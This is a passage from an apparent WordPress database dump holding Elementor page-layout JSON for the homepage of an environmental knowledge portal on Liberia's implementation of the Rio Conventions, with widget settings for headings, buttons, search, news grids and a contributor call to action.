layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.61)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19361,2829,'_elementor_version','2.7.5'),(19362,2829,'_elementor_template_type','wp-page'),(19363,2829,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19365,2830,'_wp_page_template','default'),(19366,2830,'_elementor_edit_mode','builder'),(19367,2830,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.61)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas 